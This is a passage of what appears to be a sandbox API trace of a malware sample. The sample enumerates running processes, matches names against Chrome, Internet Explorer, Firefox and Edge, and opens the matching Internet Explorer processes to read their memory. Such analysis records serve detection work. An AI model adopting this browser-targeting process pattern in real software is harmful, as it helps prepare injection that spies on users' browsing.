	[0256.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.769] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0256.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.769] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.769] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0256.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.770] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0256.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0256.771] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0256.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xb3e4
	[0256.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.771] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0256.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.772] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.773] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0256.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.773] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0256.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xb3e8
	[0256.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.775] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0256.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.775] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.775] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0256.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.775] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0256.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xb3ec
	[0256.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.777] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0256.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.777] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.778] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0256.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.778] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0256.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xb3f0
	[0256.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.779] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0256.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.780] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.780] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0256.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.780] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0256.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xb3f4
	[0256.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.781] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0256.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.782] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.782] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0256.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.783] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.783] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0256.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xb3f8
	[0256.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.784] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0256.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.785] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.785] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0256.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.785] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0256.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xb3fc
	[0256.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.786] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0256.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.787] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.787] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0256.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.787] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0256.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xb400
	[0256.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.789] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0256.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.789] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.790] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0256.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.790] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0256.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xb404
	[0256.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.791] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0256.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.791] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.792] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0256.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.793] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0256.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xb408
	[0256.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.794] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0256.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.794] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.794] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0256.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.795] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.795] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0256.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xb40c
	[0256.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.796] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0256.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.796] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.797] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0256.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.797] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0256.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xb410
	[0256.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.798] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0256.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.799] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.800] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0256.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.800] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0256.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xb414
	[0256.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.802] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0256.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.802] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.803] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0256.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.803] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0256.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xb418
	[0256.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.804] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0256.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.805] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.805] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0256.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.806] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0256.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xb41c
	[0256.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.808] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0256.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.808] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.809] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0256.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.809] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.809] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xb420
	[0256.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.810] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.811] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.811] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.812] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.812] NtQueryInformationProcess (in: ProcessHandle=0xb420, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.812] ReadProcessMemory (in: hProcess=0xb420, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.812] ReadProcessMemory (in: hProcess=0xb420, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.812] ReadProcessMemory (in: hProcess=0xb420, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.812] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xb424
	[0256.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.814] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.815] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.815] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.815] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.815] NtQueryInformationProcess (in: ProcessHandle=0xb424, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.815] ReadProcessMemory (in: hProcess=0xb424, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.816] ReadProcessMemory (in: hProcess=0xb424, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.816] ReadProcessMemory (in: hProcess=0xb424, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.816] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.816] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xb428
	[0256.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.817] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.817] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.817] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.818] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.818] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0256.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xb42c
	[0256.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.819] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0256.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.819] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.820] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0256.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.820] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xb430
	[0256.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.821] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.821] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.822] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.822] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xb434
	[0256.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.825] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.825] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.825] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.826] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.826] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xb438
